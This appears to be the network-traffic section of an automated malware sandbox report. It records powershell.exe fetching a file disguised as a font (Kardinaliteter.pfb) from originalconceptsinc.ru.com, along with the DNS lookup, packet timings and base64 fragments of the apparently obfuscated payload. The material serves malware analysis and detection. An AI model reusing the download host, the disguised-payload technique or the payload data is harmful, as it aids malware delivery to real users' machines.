                                  Apr 19, 2024 18:16:00.868084908 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868093014 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868141890 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868179083 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868185997 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868216991 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868254900 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868262053 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868292093 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868328094 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868334055 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868366957 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868405104 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868411064 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868443966 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868480921 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868486881 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868524075 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868561029 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868571997 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868597984 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868634939 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868637085 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868673086 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868710041 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868721008 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868747950 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868786097 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868798971 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868824005 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868860006 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868870020 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868897915 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868935108 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868941069 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868972063 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869008064 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869015932 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869045973 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869082928 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869091988 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869121075 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869158030 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869164944 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869195938 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869230986 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869239092 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869270086 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869307041 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869312048 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869347095 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869383097 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869385958 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869422913 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869461060 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869466066 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869499922 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869537115 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869544029 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869575024 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869611979 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869618893 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869656086 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869693041 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869699001 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869729996 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869767904 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869776011 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869806051 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869843006 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869844913 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869882107 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869919062 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869926929 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869956970 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869995117 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869997025 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.870034933 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.870080948 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379511118 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379578114 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379618883 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379631996 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379657984 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379697084 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379709005 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379733086 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379738092 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379770041 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379780054 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379791975 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379821062 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379841089 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379859924 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379878998 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379899025 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379919052 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379936934 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379956007 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379977942 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379998922 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380019903 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380036116 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380059958 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380075932 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380125999 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380131960 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380168915 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380196095 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380207062 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380224943 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380249977 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380270004 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380287886 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380300045 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380327940 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380338907 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380367994 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380378962 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380405903 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380424023 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380450010 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380462885 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380494118 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380508900 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380533934 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380559921 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380573034 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380585909 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380614042 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380626917 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380656958 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380678892 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380717993 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.888097048 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.888190985 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.888201952 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.888269901 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:05.865170956 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:05.865314960 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:17:41.906707048 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:17:43.163722992 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:17:45.663666964 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:17:50.647950888 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:18:00.616799116 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:18:20.554255962 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:19:00.431574106 CEST4973080192.168.2.4216.10.249.248

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Apr 19, 2024 18:15:57.559829950 CEST5251153192.168.2.41.1.1.1
                                  Apr 19, 2024 18:15:57.702763081 CEST53525111.1.1.1192.168.2.4

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Apr 19, 2024 18:15:57.559829950 CEST192.168.2.41.1.1.10xc31aStandard query (0)originalconceptsinc.ru.comA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Apr 19, 2024 18:15:57.702763081 CEST1.1.1.1192.168.2.40xc31aNo error (0)originalconceptsinc.ru.com216.10.249.248A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • originalconceptsinc.ru.com

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.449730216.10.249.248807732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  Apr 19, 2024 18:15:58.216409922 CEST193OUTGET /asdt/Kardinaliteter.pfb HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                  Host: originalconceptsinc.ru.com
                                  Connection: Keep-Alive
                                  Apr 19, 2024 18:15:58.826647043 CEST1289INHTTP/1.1 200 OK
                                  Date: Fri, 19 Apr 2024 16:15:57 GMT
                                  Server: Apache
                                  Last-Modified: Thu, 18 Apr 2024 10:24:26 GMT
                                  Accept-Ranges: bytes
                                  Content-Length: 435220
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: application/x-font-type1
                                  Data Raw: 63 51 47 62 63 51 47 62 75 33 32 49 45 77 44 72 41 6a 51 77 36 77 4a 74 66 51 4e 63 4a 41 54 72 41 69 50 46 36 77 4b 78 75 37 6e 53 30 6c 4d 4b 63 51 47 62 36 77 4c 34 73 49 48 78 4d 50 4c 66 76 58 45 42 6d 33 45 42 6d 34 48 42 48 74 39 7a 53 48 45 42 6d 2b 73 43 4a 38 46 78 41 5a 76 72 41 69 34 6f 75 76 79 50 65 4f 31 78 41 5a 76 72 41 6d 6d 6f 63 51 47 62 36 77 4c 42 67 7a 48 4b 36 77 4b 68 49 75 73 43 2f 58 43 4a 46 41 74 78 41 5a 74 78 41 5a 76 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 48 45 42 6d 2b 73 43 6a 55 4b 42 2b 55 4e 36 64 67 4a 38 7a 4f 73 43 58 47 39 78 41 5a 75 4c 52 43 51 45 36 77 4b 45 32 65 73 43 32 32 65 4a 77 2b 73 43 6e 6b 2f 72 41 72 6c 69 67 63 4f 63 69 54 67 42 63 51 47 62 36 77 49 75 44 72 71 47 45 30 63 68 36 77 4a 35 52 2b 73 43 2f 4d 4f 42 38 6d 5a 6e 35 45 33 72 41 70 45 47 63 51 47 62 67 66 4c 67 64 4b 4e 73 63 51 47 62 63 51 47 62 63 51 47 62 36 77 4b 43 78 6e 45 42 6d 2b 73 43 45 74 2b 4c 44 42 42 78 41 5a 76 72 41 73 73 31 69 51 77 54 36 77 49 53 47 33 45 42 6d 30 4c 72 41 68 4b 50 63 51 47 62 67 66 71 73 68 51 51 41 64 64 58 72 41 68 31 62 36 77 4a 4e 48 59 6c 63 4a 41 7a 72 41 76 64 71 36 77 4b 67 4d 59 48 74 41 41 4d 41 41 4f 73 43 66 4e 6e 72 41 67 54 44 69 31 51 6b 43 48 45 42 6d 33 45 42 6d 34 74 38 4a 41 54 72 41 6d 74 53 63 51 47 62 69 65 74 78 41 5a 74 78 41 5a 75 42 77 35 77 41 41 41 42 78 41 5a 74 78 41 5a 74 54 63 51 47 62 63 51 47 62 61 6b 44 72 41 6f 30 68 63 51 47 62 69 65 74 78 41 5a 74 78 41 5a 76 48 67 77 41 42 41 41 41 41 45 49 30 43 36 77 49 53 73 33 45 42 6d 34 48 44 41 41 45 41 41 48 45 42 6d 2b 73 43 72 35 6c 54 63 51 47 62 63 51 47 62 69 65 76 72 41 69 44 4c 36 77 4b 61 53 34 6d 37 42 41 45 41 41 48 45 42 6d 33 45 42 6d 34 48 44 42 41 45 41 41 4f 73 43 6e 73 48 72 41 74 59 2b 55 2b 73 43 59 61 31 78 41 5a 74 71 2f 33 45 42 6d 33 45 42 6d 34 50 43 42 58 45 42 6d 33 45 42 6d 7a 48 32 63 51 47 62 36 77 4c 67 64 54 48 4a 36 77 49 51 35 58 45 42 6d 34 73 61 63 51 47 62 36 77 4b 55 74 45 48 72 41 69 4c 77 63 51 47 62 4f 52 77 4b 64 66 50 72 41 67 52 61 36 77 4b 71 4f 30 62 72 41 72 74 71 63 51 47 62 67 48 77 4b 2b 37 68 31 33 48 45 42 6d 33 45 42 6d 34 74 45 43 76 78 78 41 5a 76 72 41 6c 45 6d 4b 66 44 72 41 6a 4f 4e 63 51 47 62 2f 39 4a 78 41 5a 74 78 41 5a 75 36 72 49 55 45 41 48 45 42 6d 33 45 42 6d 7a 48 41 63 51 47 62 36 77 4c 43 62 49 74 38 4a 41 7a 72 41 75 2f 48 63 51 47 62 67 54 51 48 53 6c 33 51 39 2b 73 43 4d 4e 52 78 41 5a 75 44 77 41 54 72 41 69 58 5a 36 77 4c 71 7a 6a 6e 51 64 65 4e 78 41 5a 74 78 41 5a 75 4a 2b 2b 73 43 78 61 64 78 41 5a 76 2f 31 2b 73 43 72 61 58 72 41 76 6d 6e 77 37 68 52 47 33 76 65 49 2f 50 4c 6d 65 46 33 75 56 6d 46 66 71 2f 6b 50 6a 38 74 58 6c 45 47 63 78 61 47 6b 4d 75 63 63 37 6f 31 56 56 45 32 31 48 4f 66 5a 4f 4e 59 31 47 70 6c 4f 31 55 76 6a 52 6e 64 39 38 5a 63 77 52 44 50 6e 6c 47 44 52 31 31 34 53 67 65 75 55 59 4e 48 58 52 4f 44 70 76 37 70 4e 43 7a 59 41 48 59 4f 55 4e 44 75 66 52 4b 59 63 35 71 61 56 65 35 49 58 64 44 74 43 72 77 35 64 76 39 45 30 76 64 4b 48 49 43 57 32 36 73 56 72 52 72 6c 64 76 64 4b 58 65 32 6d 39 32 79 43 2b
                                  Data Ascii: cQGbcQGbu32IEwDrAjQw6wJtfQNcJATrAiPF6wKxu7nS0lMKcQGb6wL4sIHxMPLfvXEBm3EBm4HBHt9zSHEBm+sCJ8FxAZvrAi4ouvyPeO1xAZvrAmmocQGb6wLBgzHK6wKhIusC/XCJFAtxAZtxAZvR4nEBm3EBm4PBBHEBm+sCjUKB+UN6dgJ8zOsCXG9xAZuLRCQE6wKE2esC22eJw+sCnk/rArligcOciTgBcQGb6wIuDrqGE0ch6wJ5R+sC/MOB8mZn5E3rApEGcQGbgfLgdKNscQGbcQGbcQGb6wKCxnEBm+sCEt+LDBBxAZvrAss1iQwT6wISG3EBm0LrAhKPcQGbgfqshQQAddXrAh1b6wJNHYlcJAzrAvdq6wKgMYHtAAMAAOsCfNnrAgTDi1QkCHEBm3EBm4t8JATrAmtScQGbietxAZtxAZuBw5wAAABxAZtxAZtTcQGbcQGbakDrAo0hcQGbietxAZtxAZvHgwABAAAAEI0C6wISs3EBm4HDAAEAAHEBm+sCr5lTcQGbcQGbievrAiDL6wKaS4m7BAEAAHEBm3EBm4HDBAEAAOsCnsHrAtY+U+sCYa1xAZtq/3EBm3EBm4PCBXEBm3EBmzH2cQGb6wLgdTHJ6wIQ5XEBm4sacQGb6wKUtEHrAiLwcQGbORwKdfPrAgRa6wKqO0brArtqcQGbgHwK+7h13HEBm3EBm4tECvxxAZvrAlEmKfDrAjONcQGb/9JxAZtxAZu6rIUEAHEBm3EBmzHAcQGb6wLCbIt8JAzrAu/HcQGbgTQHSl3Q9+sCMNRxAZuDwATrAiXZ6wLqzjnQdeNxAZtxAZuJ++sCxadxAZv/1+sCraXrAvmnw7hRG3veI/PLmeF3uVmFfq/kPj8tXlEGcxaGkMucc7o1VVE21HOfZONY1GplO1UvjRnd98ZcwRDPnlGDR114SgeuUYNHXRODpv7pNCzYAHYOUNDufRKYc5qaVe5IXdDtCrw5dv9E0vdKHICW26sVrRrldvdKXe2m92yC+
                                  Apr 19, 2024 18:15:58.826711893 CEST1289INData Raw: 4d 55 55 70 50 4e 4b 42 56 46 61 55 31 2f 51 39 38 6a 77 4b 39 6e 4c 36 4d 6e 31 53 6c 30 4b 6c 63 34 55 74 6e 61 30 4f 46 57 32 74 64 44 4a 39 55 70 64 70 51 41 4c 31 46 33 78 53 46 33 51 54 75 51 59 71 69 35 7a 6e 31 45 32 44 70 39 72 49 38 75
                                  Data Ascii: MUUpPNKBVFaU1/Q98jwK9nL6Mn1Sl0Klc4Utna0OFW2tdDJ9UpdpQAL1F3xSF3QTuQYqi5zn1E2Dp9rI8usldn1NCY2F2U1druS+H6N2T6Rz53pekxf0PfB0Nb1Sl3fcgeiLwgs2AuRd2hskb2bJdYsYHS6LGQDz4k7VTzD2Kj2Sl15FZCuyc+T1E27S13QAIv/5H53Duknogys80rUlbNylegLcpw5XQpZ0HKYO+k1vJ/CeM85
                                  Apr 19, 2024 18:15:58.826750994 CEST1289INData Raw: 6f 42 5a 41 4d 32 70 62 54 36 66 49 76 2f 39 59 31 7a 6b 77 64 52 69 6a 37 78 52 76 64 4b 55 6c 30 58 36 46 33 51 71 50 58 64 54 6c 52 66 43 6d 2b 67 33 6f 76 4d 64 72 33 6a 36 63 41 46 33 43 66 70 72 2b 73 67 64 71 57 71 6c 36 44 70 44 30 78 2b
                                  Data Ascii: oBZAM2pbT6fIv/9Y1zkwdRij7xRvdKUl0X6F3QqPXdTlRfCm+g3ovMdr3j6cAF3Cfpr+sgdqWql6DpD0x+qFzqaizYHoBQlS6hi7AR/TB717y4hKkKQlBnKkTznZB2wrFBJexambP2UfgsYPnqENgRqMuqWzWgD1EYjuSODMuqlxWgFod895bR90q1YaJOXYJNRfLq1sufp2FRs1E1NwsDKMuf3/r4e1EdWPUL4hnBWRRDTk2Rc
                                  Apr 19, 2024 18:15:58.826791048 CEST1289INData Raw: 42 49 53 43 47 30 65 44 38 56 56 72 71 62 48 7a 4f 6a 48 57 31 42 57 46 66 65 78 78 50 71 36 45 6a 2f 73 68 56 33 4f 54 54 34 51 44 79 35 78 76 6b 35 52 32 45 38 46 45 65 2f 70 32 72 4e 73 75 30 47 5a 56 64 6b 6c 45 47 68 4f 44 63 6f 73 75 30 70
                                  Data Ascii: BISCG0eD8VVrqbHzOjHW1BWFfexxPq6Ej/shV3OTT4QDy5xvk5R2E8FEe/p2rNsu0GZVdklEGhODcosu0po19FYBrw73R/9c76Tc2R+CAnZ6RhXpNRo7spkmz8jBNG86Kj9GtaFzkAkuGzpsFVC0TNaP5n4SHSO674JzLqoWo97FRGEXwyXHLsjL8PlyAa8O90c/XO+k5NVeSkg5kzcl7arVybhyEmJ5bALUqNJQhzmNPmecXJj
                                  Apr 19, 2024 18:15:58.826829910 CEST1289INData Raw: 6a 57 7a 51 39 30 70 64 35 71 69 4b 30 53 49 4d 6e 6b 52 49 75 35 68 6c 59 33 48 67 4f 43 37 43 54 44 52 33 77 42 72 6c 2b 33 31 6b 64 4f 57 41 45 35 4a 67 77 67 39 50 76 30 64 50 75 75 2b 47 6e 41 74 4d 66 71 78 55 31 6d 70 79 6c 61 48 54 4d 37
                                  Data Ascii: jWzQ90pd5qiK0SIMnkRIu5hlY3HgOC7CTDR3wBrl+31kdOWAE5Jgwg9Pv0dPuu+GnAtMfqxU1mpylaHTM7QEO0iHzj4PCyCVypGO0ZUPJr4eLZarLgrOQq+qgOC9D42kwNfZQdK+7Iyd/oCRc56Oc5kF/a40UY2m85U2FjDcIc27iEp2ozOixKrU0e1oKRgkP1SiGpeS7bkKMXCU2I8meyu34f8NeNJFk79w2Lwkla4a1lWfSF3
                                  Apr 19, 2024 18:15:58.826869965 CEST1289INData Raw: 48 61 6a 63 45 54 39 56 74 77 68 4a 6a 4c 74 77 4b 54 57 31 44 50 2b 51 63 43 32 7a 72 67 6c 31 47 38 61 76 70 71 55 35 47 4e 55 54 4b 45 43 39 76 61 44 4b 79 63 78 4a 6f 7a 33 39 78 48 5a 41 71 37 4c 57 66 52 55 4e 69 53 51 6e 7a 5a 50 4d 75 49
                                  Data Ascii: HajcET9VtwhJjLtwKTW1DP+QcC2zrgl1G8avpqU5GNUTKEC9vaDKycxJoz39xHZAq7LWfRUNiSQnzZPMuIisw51/dz80/xuFzRFmuuLSl3Q93uovAIT3UvU4uv71D2OqEwNciBXacFRw27Ov+vWUtHjbl3Q90pu2Vlw5i4Azb6r9AUGNWzGote9RA1oeYxPJsLVOsxpT7KPBt0OTH6pVNNqLNgGhESD0XbqoQ7Kru8CzS6uy8Au
                                  Apr 19, 2024 18:15:58.826910973 CEST1289INData Raw: 62 75 70 55 58 55 34 43 6e 6f 65 62 58 4c 79 45 43 31 4e 63 6c 72 51 6e 4f 4e 47 4c 50 38 54 66 55 43 79 4c 57 66 61 37 6e 42 57 69 4f 39 30 73 73 4b 4f 39 33 34 69 66 5a 68 70 6f 49 66 4b 76 6e 68 77 63 44 72 32 61 2f 44 36 44 66 32 53 6c 31 75
                                  Data Ascii: bupUXU4CnoebXLyEC1NclrQnONGLP8TfUCyLWfa7nBWiO90ssKO934ifZhpoIfKvnhwcDr2a/D6Df2Sl1upzuSLHaMh0ExuNw+lWysAHaklQxTVAuBTpu/hnfLnL+ddUVRBuJLyXjLrCfaxUpZxt4ltZAkltNQO5uMDLxcI2Xw1qqwfFXW8HCcouk3whwa7d827DD0ku72lIl8/7rR90pS0C+sXdD3SlyEEBIZlenxMvG1yAR/y
                                  Apr 19, 2024 18:15:58.826950073 CEST1289INData Raw: 58 57 64 43 75 45 57 55 6c 72 53 4b 2b 53 4e 76 70 33 50 7a 54 79 4f 2f 33 4a 42 72 6c 34 73 67 39 6c 65 58 56 4b 47 38 74 77 6e 4c 30 5a 65 42 2f 64 64 78 41 34 56 68 79 66 66 49 72 57 63 63 78 7a 62 68 72 63 76 62 63 4b 6b 4a 50 6d 44 34 4c 4d
                                  Data Ascii: XWdCuEWUlrSK+SNvp3PzTyO/3JBrl4sg9leXVKG8twnL0ZeB/ddxA4VhyffIrWccxzbhrcvbcKkJPmD4LMXPNUAV/6z6uZEFb6xRZAsSozZ0FUdtuBiaMrtzU07NSp+Mc4yNmr3dRAfBH7WzLq02l/CpRAf16K6zLs3OI38BZ+di22QoND8toVNoEEVNEnnvhzAfdWFx/I0WbexeFZmqZMvJSAzJ6C14Vv2YONL7lQW1Cjgj/Hd
                                  Apr 19, 2024 18:15:58.826987028 CEST1289INData Raw: 76 62 73 41 4a 33 61 67 43 69 67 7a 51 41 39 62 59 67 4e 66 30 50 64 46 56 4a 57 32 53 6c 33 51 39 30 44 79 4d 36 34 45 49 6e 76 32 4e 56 32 62 4a 36 68 51 64 62 31 73 76 43 64 56 34 53 61 30 70 49 49 30 32 73 38 64 6f 6d 57 33 53 31 33 51 48 39
                                  Data Ascii: vbsAJ3agCigzQA9bYgNf0PdFVJW2Sl3Q90DyM64EInv2NV2bJ6hQdb1svCdV4Sa0pII02s8domW3S13QH9QE1PfBGtx+zy3R90qu3zB8XdD3SmEUjdInx9OdffphwRiUpfCaEHy13Dq3yAwKdrjuexwB3CIXXTowdqACs0HE1MJ/J/FVjzJcOZJ0e3cPNTewxiTZ/0OpKS9oy2rpzmSBtF5yJUKoY92iyIA3hq0d4uuhHzVRALl
                                  Apr 19, 2024 18:15:58.827029943 CEST1289INData Raw: 35 44 65 54 78 38 67 4b 63 31 4b 51 46 41 39 55 34 61 74 4d 39 53 56 30 38 50 41 38 76 56 4b 58 57 75 46 75 55 42 4a 64 72 6d 6b 41 66 32 76 44 32 6f 48 31 67 75 61 64 6f 6a 42 32 6b 61 4a 33 43 4a 58 74 6d 6d 58 64 72 6a 55 50 63 51 44 31 4d 49
                                  Data Ascii: 5DeTx8gKc1KQFA9U4atM9SV08PA8vVKXWuFuUBJdrmkAf2vD2oH1guadojB2kaJ3CJXtmmXdrjUPcQD1MINb0giQ8ZQ94qwWTGElAcuDfkqGscAfZZceS/pN7A8MK3LroPwmoUcwjIL9JjCrM0S1ADSSzL2rWLZo/gp+V/43kTsNAjQEdGWVHURXAJhaf3JpcootGlIusu2CNKN+YBPV2k44n/QUjDBaJqTXLTlBA8+PfJ0qHWS
                                  Apr 19, 2024 18:15:59.335171938 CEST1289INData Raw: 45 35 7a 4d 4d 49 2f 2f 30 33 71 59 56 78 52 63 55 75 44 37 68 69 4e 75 34 2f 6e 4e 70 52 47 4a 69 47 6e 4b 51 59 35 78 6e 62 33 6a 56 52 48 56 68 57 7a 5a 2f 4c 6e 79 57 65 59 6c 68 52 42 54 67 4b 74 61 72 4c 6e 34 47 77 54 2f 70 5a 39 5a 35 63
